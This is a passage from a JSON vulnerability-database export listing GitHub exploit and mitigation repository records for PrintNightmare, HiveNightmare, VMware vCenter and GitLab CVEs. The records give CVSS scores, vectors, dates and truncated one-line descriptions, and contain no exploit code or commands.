"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-05T03:00:36", "id": "0263BC36-BEB1-519B-965B-52D9E6AB116F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:59", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T12:10:43", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:06:09", "id": "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-07T23:15:44", "description": "# CVE-2021-1675-LPE-EXP\n**Simple LPE Exploit of CVE-2021-1675** ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T09:00:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-07T15:32:16", "id": "64AAF745-D50D-575C-B3FF-A09072475502", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:32:50", "description": "# PrintNightmare\n\nHere is a project that will help to fight agai...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-28T07:55:42", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-09-15T06:40:48", "id": "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:54:50", "description": "# PyNightmare\nPoC for CVE-2021-36934 Aka HiveNightmare/SeriousSA...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-25T00:31:11", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-12-31T15:22:31", "id": "5D86E24D-31EE-5EFA-9D3D-FDD9090FFDEE", "href": "", "cvss": {"score": 4.6, "vector": 
"AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:51", "description": "# VSSCopy\nSmall and dirty PoC f...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T00:55:23", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T14:35:30", "id": "6F87E072-E5AF-533F-8FC7-725ACB3BD31F", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:33:41", "description": "<p><strong>Windows Elevation of Privilege Vulnerability CVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-08-04T10:37:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-04T10:47:55", "id": "158640B4-C919-5413-ABA9-DF7D5AE3CC11", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:56:25", "description": "[CVE described on MSRC](https://msrc.microsoft.com/update-guide/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T14:53:09", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-06T14:49:37", "id": "6B43F1C6-9617-5317-90DA-3EB5A74767E2", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:02:55", "description": "# CVE-2021-36934\nFix for...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T13:06:51", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-06-18T04:00:43", "id": "C0AB02D4-4AD3-591D-A60F-953AC6D32CF0", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:58", "description": "# Overview #\n\nThis is a Datto RMM component to mitigate CVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-25T18:00:35", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-25T18:10:18", "id": "27F005C9-EA16-5734-81D4-8D66FA582FF9", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:04", "description": "CVE-2021\u201336934\n\nThe derived hash is used for forgery such as PTH...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T19:39:28", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-09-20T04:02:17", "id": "37A629E7-9341-5873-B641-E06D7998FA58", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T10:03:10", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T07:49:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-11-30T06:53:48", "id": "F289C7E8-209B-5B15-B6D7-8EBFBBC8BDA8", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-15T12:42:04", "description": 
"# Invoke-HiveNightmare\nPowerShell-based PoC for CVE-2021-36934, ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T03:07:56", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-07-15T12:11:50", "id": "DA7FA6E3-30A8-5040-A7DA-7D9C064865B7", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:52:49", "description": "# CVE-2021-36934\nCVE-2021-36934 PowerShell Fix\n\nThis powershell ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T12:24:24", "type": "githubexploit", "title": "Exploit for 
Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-29T06:47:23", "id": "F58F44AB-5B59-54F5-9E8E-9095AC51C919", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:56:57", "description": "\ufffd\ufffd#\u0000 \u0000C\u0000V\u0000E\u0000-\u00002\u00000\u00002\u00001\u0000-\u00003\u00006\u00009\u00003\u00004\u0000\r\u0000\n\u0000\r\u0000\n\u0000#\u0000#\u0000 \u0000U\u0000s\u0000a\u0000g\u0000e\u0000\r\u0000\n\u0000\r\u0000...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T17:24:44", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 
4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-25T06:37:22", "id": "F1AD9ED7-3058-5CFE-81D5-BCB3AF0861B3", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:10:34", "description": "# CVE-2021-22205\n\n[ about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-02T07:32:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-06-28T16:06:55", "id": "D7E6498B-522A-5F6E-ADCF-45E60A0788D9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:09:39", "description": "# CVE-2021-22005\n# VMware vCenter Server\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\n\n## Code By:Jun...", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T08:36:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2023-02-27T01:06:12", "id": "AEAB39A1-AAEB-53A6-836E-E4994CBDABF7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-29T00:01:36", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-01T05:42:17", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2021-11-01T05:47:29", "id": "CE2BB841-C742-5463-B5AB-BC69FA352CA1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-09T15:34:29", "description": "# Whitehat School `vulhub` \ud55c\uae00\ud310\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-10-29T13:13:41", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-10-30T02:32:24", "id": "0DD62799-0744-5C6C-9B24-A441A637C095", "href": "", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:25:22", "description": "# cve-hash-generator\n\nFinds an identifiable hash value for each ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-18T20:40:55", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2022-09-20T15:23:45", "id": "7D871BCD-8617-53E6-806A-ABD814B2E32F", "href": "", "cvss": {"score": 7.5, "vector": 